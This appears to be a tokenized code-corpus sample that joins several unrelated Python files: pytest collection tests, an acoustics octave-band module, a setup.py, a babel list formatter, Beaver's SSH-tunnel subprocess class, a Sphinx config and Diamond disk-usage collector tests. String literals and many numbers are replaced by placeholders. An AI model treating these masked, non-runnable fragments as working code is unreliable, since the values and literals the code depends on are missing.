"<STR_LIT>" ) <EOL> sub2 = testdir . mkpydir ( "<STR_LIT>" ) <EOL> conf1 = testdir . makeconftest ( """<STR_LIT>""" ) <EOL> conf1 . move ( sub1 . join ( conf1 . basename ) ) <EOL> conf2 = testdir . makeconftest ( """<STR_LIT>""" ) <EOL> conf2 . move ( sub2 . join ( conf2 . basename ) ) <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> p . copy ( sub1 . join ( p . basename ) ) <EOL> p . copy ( sub2 . join ( p . basename ) ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> class TestSession : <EOL> def test_parsearg ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> subdir = testdir . mkdir ( "<STR_LIT>" ) <EOL> subdir . ensure ( "<STR_LIT>" ) <EOL> target = subdir . join ( p . basename ) <EOL> p . move ( target ) <EOL> subdir . chdir ( ) <EOL> config = testdir . 
parseconfig ( p . basename ) <EOL> rcol = Session ( config = config ) <EOL> assert rcol . fspath == subdir <EOL> parts = rcol . _parsearg ( p . basename ) <EOL> assert parts [ <NUM_LIT:0> ] == target <EOL> assert len ( parts ) == <NUM_LIT:1> <EOL> parts = rcol . _parsearg ( p . basename + "<STR_LIT>" ) <EOL> assert parts [ <NUM_LIT:0> ] == target <EOL> assert parts [ <NUM_LIT:1> ] == "<STR_LIT>" <EOL> assert len ( parts ) == <NUM_LIT:2> <EOL> def test_collect_topdir ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> id = "<STR_LIT>" . join ( [ p . basename , "<STR_LIT>" ] ) <EOL> config = testdir . parseconfig ( id ) <EOL> topdir = testdir . tmpdir <EOL> rcol = Session ( config ) <EOL> assert topdir == rcol . fspath <EOL> colitems = rcol . perform_collect ( [ rcol . nodeid ] , genitems = False ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> assert colitems [ <NUM_LIT:0> ] . fspath == p <EOL> def test_collect_protocol_single_function ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> id = "<STR_LIT>" . join ( [ p . basename , "<STR_LIT>" ] ) <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> item , = items <EOL> assert item . name == "<STR_LIT>" <EOL> newid = item . nodeid <EOL> assert newid == id <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> topdir = testdir . tmpdir <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] ) <EOL> def test_collect_protocol_method ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> normid = p . basename + "<STR_LIT>" <EOL> for id in [ p . basename , <EOL> p . basename + "<STR_LIT>" , <EOL> p . basename + "<STR_LIT>" , <EOL> normid , <EOL> ] : <EOL> items , hookrec = testdir . 
inline_genitems ( id ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> assert items [ <NUM_LIT:0> ] . name == "<STR_LIT>" <EOL> newid = items [ <NUM_LIT:0> ] . nodeid <EOL> assert newid == normid <EOL> def test_collect_custom_nodes_multi_id ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> testdir . makeconftest ( """<STR_LIT>""" % p . basename ) <EOL> id = p . basename <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> assert len ( items ) == <NUM_LIT:2> <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_collect_subdir_event_ordering ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> aaa = testdir . mkpydir ( "<STR_LIT>" ) <EOL> test_aaa = aaa . join ( "<STR_LIT>" ) <EOL> p . move ( test_aaa ) <EOL> items , hookrec = testdir . inline_genitems ( ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_collect_two_commandline_args ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> aaa = testdir . mkpydir ( "<STR_LIT>" ) <EOL> bbb = testdir . mkpydir ( "<STR_LIT>" ) <EOL> test_aaa = aaa . join ( "<STR_LIT>" ) <EOL> p . copy ( test_aaa ) <EOL> test_bbb = bbb . join ( "<STR_LIT>" ) <EOL> p . move ( test_bbb ) <EOL> id = "<STR_LIT:.>" <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> assert len ( items ) == <NUM_LIT:2> <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> hookrec . 
assert_contains ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_serialization_byid ( self , testdir ) : <EOL> testdir . makepyfile ( "<STR_LIT>" ) <EOL> items , hookrec = testdir . inline_genitems ( ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> item , = items <EOL> items2 , hookrec = testdir . inline_genitems ( item . nodeid ) <EOL> item2 , = items2 <EOL> assert item2 . name == item . name <EOL> assert item2 . fspath == item . fspath <EOL> def test_find_byid_without_instance_parents ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> arg = p . basename + ( "<STR_LIT>" ) <EOL> items , hookrec = testdir . inline_genitems ( arg ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> item , = items <EOL> assert item . nodeid . endswith ( "<STR_LIT>" ) <EOL> class Test_getinitialnodes : <EOL> def test_global_file ( self , testdir , tmpdir ) : <EOL> x = tmpdir . ensure ( "<STR_LIT>" ) <EOL> config = testdir . parseconfigure ( x ) <EOL> col = testdir . getnode ( config , x ) <EOL> assert isinstance ( col , pytest . Module ) <EOL> assert col . name == '<STR_LIT>' <EOL> assert col . parent . name == testdir . tmpdir . basename <EOL> assert col . parent . parent is None <EOL> for col in col . listchain ( ) : <EOL> assert col . config is config <EOL> def test_pkgfile ( self , testdir ) : <EOL> tmpdir = testdir . tmpdir <EOL> subdir = tmpdir . join ( "<STR_LIT>" ) <EOL> x = subdir . ensure ( "<STR_LIT>" ) <EOL> subdir . ensure ( "<STR_LIT>" ) <EOL> config = testdir . parseconfigure ( x ) <EOL> col = testdir . getnode ( config , x ) <EOL> assert isinstance ( col , pytest . Module ) <EOL> assert col . name == '<STR_LIT>' <EOL> assert col . parent . parent is None <EOL> for col in col . listchain ( ) : <EOL> assert col . 
config is config <EOL> class Test_genitems : <EOL> def test_check_collect_hashes ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> p . copy ( p . dirpath ( p . purebasename + "<STR_LIT:2>" + "<STR_LIT>" ) ) <EOL> items , reprec = testdir . inline_genitems ( p . dirpath ( ) ) <EOL> assert len ( items ) == <NUM_LIT:4> <EOL> for numi , i in enumerate ( items ) : <EOL> for numj , j in enumerate ( items ) : <EOL> if numj != numi : <EOL> assert hash ( i ) != hash ( j ) <EOL> assert i != j <EOL> def test_example_items1 ( self , testdir ) : <EOL> p = testdir . makepyfile ( '''<STR_LIT>''' ) <EOL> items , reprec = testdir . inline_genitems ( p ) <EOL> assert len ( items ) == <NUM_LIT:3> <EOL> assert items [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert items [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> assert items [ <NUM_LIT:2> ] . name == '<STR_LIT>' <EOL> assert items [ <NUM_LIT:0> ] . getmodpath ( ) == "<STR_LIT>" <EOL> assert items [ <NUM_LIT:1> ] . getmodpath ( ) == "<STR_LIT>" <EOL> assert items [ <NUM_LIT:2> ] . getmodpath ( ) == "<STR_LIT>" <EOL> s = items [ <NUM_LIT:0> ] . getmodpath ( stopatmodule = False ) <EOL> assert s . endswith ( "<STR_LIT>" ) <EOL> print ( s ) <EOL> def test_class_and_functions_discovery_using_glob ( self , testdir ) : <EOL> """<STR_LIT>""" <EOL> testdir . makeini ( """<STR_LIT>""" ) <EOL> p = testdir . makepyfile ( '''<STR_LIT>''' ) <EOL> items , reprec = testdir . inline_genitems ( p ) <EOL> ids = [ x . getmodpath ( ) for x in items ] <EOL> assert ids == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_matchnodes_two_collections_same_file ( testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> p = testdir . makefile ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> res = testdir . runpytest ( "<STR_LIT>" % p . basename ) <EOL> res . stdout . 
fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> class TestNodekeywords : <EOL> def test_no_under ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> l = list ( modcol . keywords ) <EOL> assert modcol . name in l <EOL> for x in l : <EOL> assert not x . startswith ( "<STR_LIT:_>" ) <EOL> assert modcol . name in repr ( modcol . keywords ) <EOL> def test_issue345 ( self , testdir ) : <EOL> testdir . makepyfile ( """<STR_LIT>""" ) <EOL> reprec = testdir . inline_run ( "<STR_LIT>" ) <EOL> reprec . assertoutcome ( passed = <NUM_LIT:1> , failed = <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> import acoustics <EOL> from acoustics . standards . iec_61672_1_2013 import NOMINAL_OCTAVE_CENTER_FREQUENCIES as OCTAVE_CENTER_FREQUENCIES <EOL> from acoustics . standards . iec_61672_1_2013 import NOMINAL_THIRD_OCTAVE_CENTER_FREQUENCIES as THIRD_OCTAVE_CENTER_FREQUENCIES <EOL> def octave ( first , last ) : <EOL> """<STR_LIT>""" <EOL> return acoustics . signal . OctaveBand ( fstart = first , fstop = last , fraction = <NUM_LIT:1> ) . nominal <EOL> def octave_low ( first , last ) : <EOL> return octave ( first , last ) / np . sqrt ( <NUM_LIT> ) <EOL> def octave_high ( first , last ) : <EOL> return octave ( first , last ) * np . sqrt ( <NUM_LIT> ) <EOL> def third ( first , last ) : <EOL> """<STR_LIT>""" <EOL> return acoustics . signal . OctaveBand ( fstart = first , fstop = last , fraction = <NUM_LIT:3> ) . nominal <EOL> def third_low ( first , last ) : <EOL> return third ( first , last ) / <NUM_LIT> ** ( <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> def third_high ( first , last ) : <EOL> return third ( first , last ) * <NUM_LIT> ** ( <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> def third2oct ( levels , axis = None ) : <EOL> """<STR_LIT>""" <EOL> levels = np . array ( levels ) <EOL> axis = axis if axis is not None else levels . ndim - <NUM_LIT:1> <EOL> try : <EOL> assert ( levels . shape [ axis ] % <NUM_LIT:3> == <NUM_LIT:0> ) <EOL> except AssertionError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> shape = list ( levels . shape ) <EOL> shape [ axis ] = shape [ axis ] // <NUM_LIT:3> <EOL> shape . insert ( axis + <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> levels = np . reshape ( levels , shape ) <EOL> return np . squeeze ( acoustics . decibel . 
dbsum ( levels , axis = axis + <NUM_LIT:1> ) ) <EOL> def _check_band_type ( freqs ) : <EOL> """<STR_LIT>""" <EOL> octave_bands = octave ( <NUM_LIT:16> , <NUM_LIT> ) <EOL> third_oct_bands = third ( <NUM_LIT> , <NUM_LIT> ) <EOL> def _check_sort ( freqs , bands ) : <EOL> index = np . where ( np . in1d ( bands , freqs ) ) [ <NUM_LIT:0> ] <EOL> band_pos = index - index [ <NUM_LIT:0> ] <EOL> if ( band_pos == np . arange ( band_pos . size ) ) . all ( ) : <EOL> sorted = True <EOL> else : <EOL> sorted = False <EOL> return sorted <EOL> if np . in1d ( freqs , octave_bands ) . all ( ) == True : <EOL> is_sorted = _check_sort ( freqs , octave_bands ) <EOL> if is_sorted is True : <EOL> band_type = '<STR_LIT>' <EOL> else : <EOL> band_type = '<STR_LIT>' <EOL> elif np . in1d ( freqs , third_oct_bands ) . all ( ) == True : <EOL> is_sorted = _check_sort ( freqs , third_oct_bands ) <EOL> if is_sorted is True : <EOL> band_type = '<STR_LIT>' <EOL> else : <EOL> band_type = '<STR_LIT>' <EOL> else : <EOL> band_type = None <EOL> return band_type </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> from setuptools . command . test import test as TestCommand <EOL> import sys <EOL> import numpy as np <EOL> from Cython . Build import cythonize <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) <EOL> else : <EOL> long_description = "<STR_LIT>" <EOL> class PyTest ( TestCommand ) : <EOL> def finalize_options ( self ) : <EOL> TestCommand . finalize_options ( self ) <EOL> self . test_args = [ ] <EOL> self . test_suite = True <EOL> def run_tests ( self ) : <EOL> import pytest <EOL> errno = pytest . main ( self . test_args ) <EOL> sys . exit ( errno ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ "<STR_LIT>" ] ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> scripts = [ ] , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> extras_require = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> cmdclass = { '<STR_LIT:test>' : PyTest } , <EOL> ext_modules = cythonize ( '<STR_LIT>' ) , <EOL> include_dirs = [ np . get_include ( ) ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from babel . core import Locale , default_locale <EOL> DEFAULT_LOCALE = default_locale ( ) <EOL> def format_list ( lst , locale = DEFAULT_LOCALE ) : <EOL> """<STR_LIT>""" <EOL> locale = Locale . parse ( locale ) <EOL> if not lst : <EOL> return '<STR_LIT>' <EOL> if len ( lst ) == <NUM_LIT:1> : <EOL> return lst [ <NUM_LIT:0> ] <EOL> if len ( lst ) == <NUM_LIT:2> : <EOL> return locale . list_patterns [ '<STR_LIT:2>' ] . format ( * lst ) <EOL> result = locale . list_patterns [ '<STR_LIT:start>' ] . format ( lst [ <NUM_LIT:0> ] , lst [ <NUM_LIT:1> ] ) <EOL> for elem in lst [ <NUM_LIT:2> : - <NUM_LIT:1> ] : <EOL> result = locale . list_patterns [ '<STR_LIT>' ] . format ( result , elem ) <EOL> result = locale . list_patterns [ '<STR_LIT:end>' ] . format ( result , lst [ - <NUM_LIT:1> ] ) <EOL> return result </s>
<s> import os <EOL> import signal <EOL> import subprocess <EOL> import time <EOL> from beaver . base_log import BaseLog <EOL> def create_ssh_tunnel ( beaver_config , logger = None ) : <EOL> """<STR_LIT>""" <EOL> if not beaver_config . use_ssh_tunnel ( ) : <EOL> return None <EOL> logger . info ( "<STR_LIT>" ) <EOL> return BeaverSshTunnel ( beaver_config , logger = logger ) <EOL> class BeaverSubprocess ( BaseLog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , beaver_config , logger = None ) : <EOL> """<STR_LIT>""" <EOL> super ( BeaverSubprocess , self ) . __init__ ( logger = logger ) <EOL> self . _log_template = '<STR_LIT>' <EOL> self . _beaver_config = beaver_config <EOL> self . _command = '<STR_LIT>' <EOL> self . _subprocess = None <EOL> self . _logger = logger <EOL> def run ( self ) : <EOL> self . _log_debug ( '<STR_LIT>' . format ( self . _command ) ) <EOL> self . _subprocess = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT:-c>' , self . _command ] , preexec_fn = os . setsid ) <EOL> self . poll ( ) <EOL> def poll ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _subprocess is not None : <EOL> self . _subprocess . poll ( ) <EOL> time . sleep ( self . _beaver_config . get ( '<STR_LIT>' ) ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _subprocess is not None : <EOL> os . killpg ( self . _subprocess . pid , signal . SIGTERM ) <EOL> self . _subprocess = None <EOL> class BeaverSshTunnel ( BeaverSubprocess ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , beaver_config , logger = None ) : <EOL> super ( BeaverSshTunnel , self ) . __init__ ( beaver_config , logger = logger ) <EOL> self . _log_template = '<STR_LIT>' <EOL> key_file = beaver_config . get ( '<STR_LIT>' ) <EOL> tunnel = beaver_config . get ( '<STR_LIT>' ) <EOL> tunnel_port = beaver_config . get ( '<STR_LIT>' ) <EOL> remote_host = beaver_config . get ( '<STR_LIT>' ) <EOL> remote_port = beaver_config . get ( '<STR_LIT>' ) <EOL> ssh_opts = [ ] <EOL> if self . 
get_port ( tunnel ) : <EOL> ssh_opts . append ( '<STR_LIT>' . format ( self . get_port ( tunnel ) ) ) <EOL> tunnel = self . get_host ( tunnel ) <EOL> ssh_opts . append ( '<STR_LIT>' ) <EOL> ssh_opts . append ( '<STR_LIT>' ) <EOL> ssh_opts . append ( '<STR_LIT>' ) <EOL> ssh_opts = ssh_opts + beaver_config . get ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> self . _command = command . format ( '<STR_LIT:U+0020>' . join ( ssh_opts ) , tunnel_port , remote_host , remote_port , key_file , tunnel ) <EOL> self . run ( ) <EOL> def get_host ( self , tunnel = None ) : <EOL> port = self . get_port ( tunnel ) <EOL> if not port : <EOL> return tunnel <EOL> return tunnel [ <NUM_LIT:0> : - ( len ( port ) + <NUM_LIT:1> ) ] <EOL> def get_port ( self , tunnel = None ) : <EOL> host_port = None <EOL> port = None <EOL> if tunnel : <EOL> host_port = tunnel . split ( '<STR_LIT:@>' ) [ - <NUM_LIT:1> ] <EOL> if host_port and len ( host_port . split ( '<STR_LIT::>' ) ) == <NUM_LIT:2> : <EOL> port = host_port . split ( '<STR_LIT::>' ) [ - <NUM_LIT:1> ] <EOL> return port </s>
<s> import sys <EOL> import os <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from diskusage import DiskUsageCollector <EOL> class TestDiskUsageCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . collector = DiskUsageCollector ( config , None ) <EOL> def test_config ( self ) : <EOL> self . assertFalse ( self . collector . config [ '<STR_LIT>' ] ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( DiskUsageCollector ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> def test_get_disk_statistics ( self ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> open_mock = patch_open . start ( ) <EOL> result = self . collector . get_disk_statistics ( ) <EOL> patch_open . stop ( ) <EOL> open_mock . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> sorted ( result . keys ( ) ) , <EOL> [ ( <NUM_LIT:8> , <NUM_LIT:0> ) , ( <NUM_LIT:8> , <NUM_LIT:1> ) , ( <NUM_LIT:8> , <NUM_LIT:16> ) , ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:8> , <NUM_LIT:32> ) , <EOL> ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:9> , <NUM_LIT:0> ) ] ) <EOL> return result <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . 
start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_verify_supporting_vda_and_xvdb ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( <EOL> '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . 
object ( Collector , '<STR_LIT>' ) <EOL> def test_verify_supporting_md_dm ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_verify_supporting_disk ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . 
assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_service_Time ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
